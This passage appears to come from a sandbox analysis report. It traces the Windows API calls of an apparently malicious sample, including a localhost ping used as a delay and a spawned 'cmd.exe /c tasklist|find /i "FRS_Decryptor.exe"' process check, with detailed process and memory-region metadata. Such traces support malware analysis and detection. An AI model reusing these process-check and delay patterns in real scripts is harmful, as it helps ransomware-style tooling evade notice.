DestinationAddress=0x100007f, RequestData=0xa8c160, RequestSize=0x20, RequestOptions=0x7eefd4, ReplyBuffer=0xa95270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xa95270) returned 0x1 [0122.265] InetNtopW (in: Family=2, pAddr=0x7eefc4, pStringBuf=0x7ef0ec, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0122.265] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x7eef58, nSize=0x0, Arguments=0x7eef54 | out: lpBuffer="羠©廊~⛔\x94䰨盪✣") returned 0x16 [0122.265] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0122.265] _fileno (_File=0x76ea4c28) returned 1 [0122.265] _get_osfhandle (_FileHandle=1) returned 0x28 [0122.265] GetFileType (hFile=0x28) returned 0x2 [0122.265] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x7eef1c | out: lpMode=0x7eef1c) returned 0 [0122.265] GetLastError () returned 0x6 [0122.265] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x7eee80, nSize=0x50 | out: lpBuffer="~✣") returned 0x0 [0122.265] _fileno (_File=0x76ea4c28) returned 1 [0122.265] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0122.265] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0122.265] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xa97fd8 [0122.265] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xa97fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0122.265] _fileno (_File=0x76ea4c28) returned 1 [0122.265] _write (in: _FileHandle=1, _Buf=0xa97fd8*, _MaxCharCount=0x16 | out: _Buf=0xa97fd8*) returned 22 [0122.265] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0122.265] _fileno (_File=0x76ea4c28) returned 1 [0122.265] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0122.265] LocalFree (hMem=0xa97fd8) returned 0x0 [0122.266] LocalFree (hMem=0xa97fa0) returned 0x0 [0122.266] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x7eef58, nSize=0x0, Arguments=0x7eef54 | out: lpBuffer="羠©廊~⛿\x94䰨盪✼") returned 0x9 [0122.266] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0122.266] _fileno (_File=0x76ea4c28) returned 1 [0122.266] _get_osfhandle (_FileHandle=1) returned 0x28 [0122.266] GetFileType (hFile=0x28) returned 0x2 [0122.266] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x7eef1c | out: lpMode=0x7eef1c) returned 0 [0122.266] GetLastError () returned 0x6 [0122.266] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x7eee80, nSize=0x50 | out: lpBuffer="~✼") returned 0x0 [0122.266] _fileno (_File=0x76ea4c28) returned 1 [0122.266] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0122.266] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0122.266] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa88a30 [0122.266] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xa88a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0122.266] _fileno (_File=0x76ea4c28) returned 1 [0122.266] _write (in: _FileHandle=1, _Buf=0xa88a30*, _MaxCharCount=0x9 | out: _Buf=0xa88a30*) returned 9 [0122.266] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0122.266] _fileno (_File=0x76ea4c28) returned 1 [0122.266] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0122.266] LocalFree (hMem=0xa88a30) returned 0x0 [0122.266] LocalFree (hMem=0xa97fa0) returned 0x0 [0122.266] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x7eef5c, nSize=0x0, Arguments=0x7eef58 | out: lpBuffer="羠©廊~➷\x94䰨盪✧") returned 0x9 [0122.266] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0122.266] _fileno (_File=0x76ea4c28) returned 1 [0122.266] _get_osfhandle (_FileHandle=1) returned 0x28 [0122.266] GetFileType (hFile=0x28) returned 0x2 [0122.266] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x7eef20 | out: lpMode=0x7eef20) returned 0 [0122.266] GetLastError () returned 0x6 [0122.266] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x7eee84, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0122.266] _fileno (_File=0x76ea4c28) returned 1 [0122.266] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0122.266] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0122.266] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa88a30 [0122.266] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xa88a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0122.266] _fileno (_File=0x76ea4c28) returned 1 [0122.266] _write (in: _FileHandle=1, _Buf=0xa88a30*, _MaxCharCount=0x9 | out: _Buf=0xa88a30*) returned 9 [0122.266] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0122.266] _fileno (_File=0x76ea4c28) returned 1 [0122.266] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0122.266] LocalFree (hMem=0xa88a30) returned 0x0 [0122.266] LocalFree (hMem=0xa97fa0) returned 0x0 [0122.266] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x7eef58, nSize=0x0, Arguments=0x7eef54 | out: lpBuffer="羠©廊~⟘\x94䰨盪✨") returned 0x9 [0122.266] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0122.266] _fileno (_File=0x76ea4c28) returned 1 [0122.266] _get_osfhandle (_FileHandle=1) returned 0x28 [0122.266] GetFileType (hFile=0x28) returned 0x2 [0122.266] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x7eef1c | out: lpMode=0x7eef1c) returned 0 [0122.266] GetLastError () returned 0x6 [0122.266] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x7eee80, nSize=0x50 | out: lpBuffer="~✨") returned 0x0 [0122.267] _fileno (_File=0x76ea4c28) returned 1 [0122.267] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0122.267] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0122.267] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa88a30 [0122.267] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xa88a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0122.267] _fileno (_File=0x76ea4c28) returned 1 [0122.267] _write (in: _FileHandle=1, _Buf=0xa88a30*, _MaxCharCount=0x9 | out: _Buf=0xa88a30*) returned 9 [0122.267] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0122.267] _fileno (_File=0x76ea4c28) returned 1 [0122.267] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0122.267] LocalFree (hMem=0xa88a30) returned 0x0 [0122.267] LocalFree (hMem=0xa97fa0) returned 0x0 [0122.267] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x7eeee0, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0122.267] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x7eeeb4, nSize=0x0, Arguments=0x7eeeb0 | out: lpBuffer="羠©~᧰\x94䰨盪❏") returned 0x5c [0122.267] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0122.267] _fileno (_File=0x76ea4c28) returned 1 [0122.267] _get_osfhandle (_FileHandle=1) returned 0x28 [0122.267] GetFileType (hFile=0x28) returned 0x2 [0122.267] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x7eee78 | out: lpMode=0x7eee78) returned 0 [0122.267] GetLastError () returned 0x6 [0122.267] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x7eeddc, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0122.267] _fileno (_File=0x76ea4c28) returned 1 [0122.267] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0122.267] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0122.267] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0xa98068 [0122.267] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0xa98068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0122.267] _fileno (_File=0x76ea4c28) returned 1 [0122.267] _write (in: _FileHandle=1, _Buf=0xa98068*, _MaxCharCount=0x5c | out: _Buf=0xa98068*) returned 92 [0122.267] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0122.267] _fileno (_File=0x76ea4c28) returned 1 [0122.267] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0122.267] LocalFree (hMem=0xa98068) returned 0x0 [0122.267] LocalFree (hMem=0xa97fa0) returned 0x0 [0122.267] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x7eeec0, nSize=0x0, Arguments=0x7eeebc | out: lpBuffer="羠©~ᨧ\x94䰨盪❓") returned 0x61 [0122.267] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0122.267] _fileno (_File=0x76ea4c28) returned 1 [0122.267] _get_osfhandle (_FileHandle=1) returned 0x28 [0122.267] GetFileType (hFile=0x28) returned 0x2 [0122.267] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x7eee84 | out: lpMode=0x7eee84) returned 0 [0122.267] GetLastError () returned 0x6 [0122.267] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x7eede8, nSize=0x50 | out: lpBuffer="~❓") returned 0x0 [0122.267] _fileno (_File=0x76ea4c28) returned 1 [0122.267] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0122.267] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0122.267] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0xa98070 [0122.267] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0xa98070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0122.267] _fileno (_File=0x76ea4c28) returned 1 [0122.267] _write (in: _FileHandle=1, _Buf=0xa98070*, _MaxCharCount=0x61 | out: _Buf=0xa98070*) returned 97 [0122.267] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0122.268] _fileno (_File=0x76ea4c28) returned 1 [0122.268] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0122.268] LocalFree (hMem=0xa98070) returned 0x0 [0122.268] LocalFree (hMem=0xa97fa0) returned 0x0 [0122.268] IcmpCloseHandle (IcmpHandle=0xa86d08) returned 1 [0122.268] LocalFree (hMem=0xa8c160) returned 0x0 [0122.268] LocalFree (hMem=0xa95270) returned 0x0 [0122.268] WSACleanup () returned 0 [0122.268] exit (_Code=0) Thread: id = 365 os_tid = 0xbe4 Thread: id = 366 os_tid = 0x920 Process: id = "127" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x5fd05000" os_pid = "0x788" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6577 start_va = 0x310000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 6578 start_va = 0x330000 end_va = 0x331fff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 6579 start_va = 0x340000 end_va = 0x34efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 6580 start_va = 0x350000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 6581 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 6582 start_va = 0x490000 end_va = 0x493fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 6583 start_va = 0x4a0000 end_va = 0x4a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 6584 start_va = 0x4b0000 end_va = 0x4b1fff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 6585 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 6586 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6587 start_va = 0x7f010000 end_va = 0x7f032fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f010000" filename = "" Region: id = 6588 start_va = 0x7f037000 end_va = 0x7f037fff entry_point = 0x0 region_type = private name = "private_0x000000007f037000" filename = "" Region: id = 6589 start_va = 0x7f03c000 end_va = 0x7f03cfff entry_point = 0x0 region_type = private name = "private_0x000000007f03c000" filename = "" Region: id = 6590 start_va = 0x7f03d000 end_va = 0x7f03ffff entry_point = 0x0 region_type = private name = "private_0x000000007f03d000" filename = "" Region: id = 6591 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6592 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6593 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6594 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 6595 start_va = 0x500000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 6596 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6597 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6598 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6599 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 6600 start_va = 0x4f0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 6601 start_va = 0x510000 end_va = 0x58dfff entry_point = 0x510000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6602 start_va = 0x660000 end_va = 0x75ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 6603 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6604 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6605 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6606 start_va = 0x7ef10000 end_va = 0x7f00ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ef10000" filename = "" Region: id = 6607 start_va = 0x320000 end_va = 0x323fff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 6608 start_va = 0x760000 end_va = 0xa34fff entry_point = 0x760000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6627 start_va = 0x330000 end_va = 0x333fff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Thread: id = 367 os_tid = 0x6bc [0122.295] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0122.295] __set_app_type (_Type=0x1) [0122.295] __p__fmode () returned 0x76ea1768 [0122.295] __p__commode () returned 0x76ea176c [0122.295] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0122.295] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0122.295] GetCurrentThreadId () returned 0x6bc [0122.295] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x6bc) returned 0x34 [0122.296] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0122.296] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0122.296] SetThreadUILanguage (LangId=0x0) returned 0x409 [0122.297] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0122.297] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x48fba4 | out: phkResult=0x48fba4*=0x0) returned 0x2 [0122.298] VirtualQuery (in: lpAddress=0x48fbb3, lpBuffer=0x48fb4c, dwLength=0x1c | out: lpBuffer=0x48fb4c*(BaseAddress=0x48f000, AllocationBase=0x390000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0122.298] VirtualQuery (in: lpAddress=0x390000, lpBuffer=0x48fb4c, dwLength=0x1c | out: lpBuffer=0x48fb4c*(BaseAddress=0x390000, AllocationBase=0x390000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0122.298] VirtualQuery (in: lpAddress=0x391000, lpBuffer=0x48fb4c, dwLength=0x1c | out: lpBuffer=0x48fb4c*(BaseAddress=0x391000, AllocationBase=0x390000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0122.298] VirtualQuery (in: lpAddress=0x393000, lpBuffer=0x48fb4c, dwLength=0x1c | out: lpBuffer=0x48fb4c*(BaseAddress=0x393000, AllocationBase=0x390000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0122.298] VirtualQuery (in: lpAddress=0x490000, lpBuffer=0x48fb4c, dwLength=0x1c | out: lpBuffer=0x48fb4c*(BaseAddress=0x490000, AllocationBase=0x490000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0122.298] GetConsoleOutputCP () returned 0x1b5 [0122.298] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0122.298] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0122.298] _get_osfhandle (_FileHandle=1) returned 0x318 [0122.298] SetConsoleMode (hConsoleHandle=0x318, dwMode=0x0) returned 0 [0122.298] _get_osfhandle (_FileHandle=1) returned 0x318 [0122.298] GetConsoleMode (in: hConsoleHandle=0x318, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0122.298] _get_osfhandle (_FileHandle=0) returned 0x24 [0122.298] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0122.298] GetEnvironmentStringsW () returned 0x6640c0* [0122.298] FreeEnvironmentStringsA (penv="=") returned 1 [0122.299] GetEnvironmentStringsW () returned 0x6640c0* [0122.299] FreeEnvironmentStringsA (penv="=") returned 1 [0122.299] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x48eaf4 | out: phkResult=0x48eaf4*=0x44) returned 0x0 [0122.299] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x48eafc, lpData=0x48eb00, lpcbData=0x48eaf8*=0x1000 | out: lpType=0x48eafc*=0x0, lpData=0x48eb00*=0x0, lpcbData=0x48eaf8*=0x1000) returned 0x2 [0122.299] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x48eafc, lpData=0x48eb00, lpcbData=0x48eaf8*=0x1000 | out: lpType=0x48eafc*=0x4, lpData=0x48eb00*=0x1, lpcbData=0x48eaf8*=0x4) returned 0x0 [0122.299] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x48eafc, lpData=0x48eb00, lpcbData=0x48eaf8*=0x1000 | out: lpType=0x48eafc*=0x0, lpData=0x48eb00*=0x1, lpcbData=0x48eaf8*=0x1000) returned 0x2 [0122.299] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x48eafc, lpData=0x48eb00, lpcbData=0x48eaf8*=0x1000 | out: lpType=0x48eafc*=0x4, lpData=0x48eb00*=0x0, lpcbData=0x48eaf8*=0x4) returned 0x0 [0122.299] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x48eafc, lpData=0x48eb00, lpcbData=0x48eaf8*=0x1000 | out: lpType=0x48eafc*=0x4, lpData=0x48eb00*=0x40, lpcbData=0x48eaf8*=0x4) returned 0x0 [0122.299] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x48eafc, lpData=0x48eb00, lpcbData=0x48eaf8*=0x1000 | out: lpType=0x48eafc*=0x4, lpData=0x48eb00*=0x40, lpcbData=0x48eaf8*=0x4) returned 0x0 [0122.299] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x48eafc, lpData=0x48eb00, lpcbData=0x48eaf8*=0x1000 | out: lpType=0x48eafc*=0x0, lpData=0x48eb00*=0x40, lpcbData=0x48eaf8*=0x1000) returned 0x2 [0122.299] RegCloseKey (hKey=0x44) returned 0x0 [0122.299] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x48eaf4 | out: phkResult=0x48eaf4*=0x44) returned 0x0 [0122.299] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x48eafc, lpData=0x48eb00, lpcbData=0x48eaf8*=0x1000 | out: lpType=0x48eafc*=0x0, lpData=0x48eb00*=0x40, lpcbData=0x48eaf8*=0x1000) returned 0x2 [0122.299] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x48eafc, lpData=0x48eb00, lpcbData=0x48eaf8*=0x1000 | out: lpType=0x48eafc*=0x4, lpData=0x48eb00*=0x1, lpcbData=0x48eaf8*=0x4) returned 0x0 [0122.299] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x48eafc, lpData=0x48eb00, lpcbData=0x48eaf8*=0x1000 | out: lpType=0x48eafc*=0x0, lpData=0x48eb00*=0x1, lpcbData=0x48eaf8*=0x1000) returned 0x2 [0122.299] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x48eafc, lpData=0x48eb00, lpcbData=0x48eaf8*=0x1000 | out: lpType=0x48eafc*=0x4, lpData=0x48eb00*=0x0, lpcbData=0x48eaf8*=0x4) returned 0x0 [0122.299] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x48eafc, lpData=0x48eb00, lpcbData=0x48eaf8*=0x1000 | out: lpType=0x48eafc*=0x4, lpData=0x48eb00*=0x9, lpcbData=0x48eaf8*=0x4) returned 0x0 [0122.299] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x48eafc, lpData=0x48eb00, lpcbData=0x48eaf8*=0x1000 | out: lpType=0x48eafc*=0x4, 